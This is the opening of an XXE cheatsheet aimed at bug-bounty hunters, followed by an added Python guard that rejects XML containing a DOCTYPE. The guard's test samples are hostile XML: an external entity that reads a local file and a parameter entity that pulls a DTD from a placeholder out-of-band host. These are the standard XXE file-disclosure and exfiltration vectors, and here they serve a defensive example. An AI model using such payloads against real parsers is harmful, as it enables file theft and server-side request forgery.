XXE (XML External Entity) Cheatsheet
Vulnerability Summary
This cheatsheet provides a quick reference for exploiting and testing XML External Entity (XXE) vulnerabilities. It includes common payloads, techniques for file disclosure, SSRF, blind XXE exploitation, out-of-band exfiltration, and typical XML structures used during testing. It is intended as a practical guide to quickly identify and exploit XXE in different scenarios and parser configurations.
Understanding XXE (XML External Entity)
XXE (XML External Entity) vulnerabilities arise when an application processes XML data with a parser that permits the definition and resolution of external entities. An attacker can exploit this to read local files, make requests to internal systems (Server-Side Request Forgery, SSRF), or, in rare cases, execute arbitrary code.
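Because every XXE variant (inline entity, external SYSTEM entity, parameter entity used for blind or out-of-band cases) depends on a DTD to declare the entity, the simplest parser-side fix is to refuse any DOCTYPE before the real parser runs. The following added example (not part of the original cheatsheet) shows such a pre-parse guard in Python built on the standard-library expat bindings; the sample documents and the placeholder URIs in them are constructed for the demonstration.

```python
import xml.parsers.expat as expat
from xml.etree import ElementTree as ET

# Constructed sample documents (not from the page): one benign, two carrying DTDs.
BENIGN = b'<?xml version="1.0"?><order><id>42</id></order>'
EXTERNAL_ENTITY = (b'<?xml version="1.0"?>'
    b'<!DOCTYPE order [<!ENTITY xxe SYSTEM "file:///placeholder/secret.txt">]>'
    b'<order><id>&xxe;</id></order>')
PARAM_ENTITY = (b'<?xml version="1.0"?>'
    b'<!DOCTYPE order [<!ENTITY % ext SYSTEM "http://oob.example/hypothetical.dtd"> %ext;]>'
    b'<order/>')

class DtdRejected(ValueError):
    """Raised when the document carries a DOCTYPE or an external entity reference."""

def reject_dtd(xml_bytes: bytes) -> None:
    """Pre-parse guard. Every XXE variant needs a DTD to declare its entity,
    so refusing any DOCTYPE closes inline, external and parameter-entity cases."""
    parser = expat.ParserCreate()
    # Never expand parameter entities, even if a handler below were bypassed.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected(f"DOCTYPE declaration not allowed (root {name!r})")

    def on_external_ref(context, base, sysid, pubid):
        # Defense in depth: fires only if a DOCTYPE somehow got past on_doctype.
        raise DtdRejected(f"external entity reference not allowed ({sysid!r})")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(xml_bytes, True)   # exceptions raised in handlers propagate
    except expat.ExpatError as exc:
        raise ValueError(f"malformed XML: {exc}") from exc

def inspect_xml(xml_bytes: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) so callers can log rejected submissions."""
    try:
        reject_dtd(xml_bytes)
    except ValueError as exc:          # DtdRejected is a ValueError too
        return False, str(exc)
    return True, "no DTD"

def parse_untrusted(xml_bytes: bytes) -> ET.Element:
    """Only hand the bytes to the real parser after the guard has accepted them."""
    reject_dtd(xml_bytes)
    return ET.fromstring(xml_bytes)
```

Documents that legitimately need an internal DTD should be handled by a separate, explicitly allowlisted path rather than by weakening this guard.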
Why is XXE a High-Value Target in Bug Bounty Programs?
XXE vulnerabilities often evade detection by basic automated scans. Given their potential to compromise server infrastructure, they are typically classified as P1 (Critical) or P2 (High) on platforms such as HackerOne.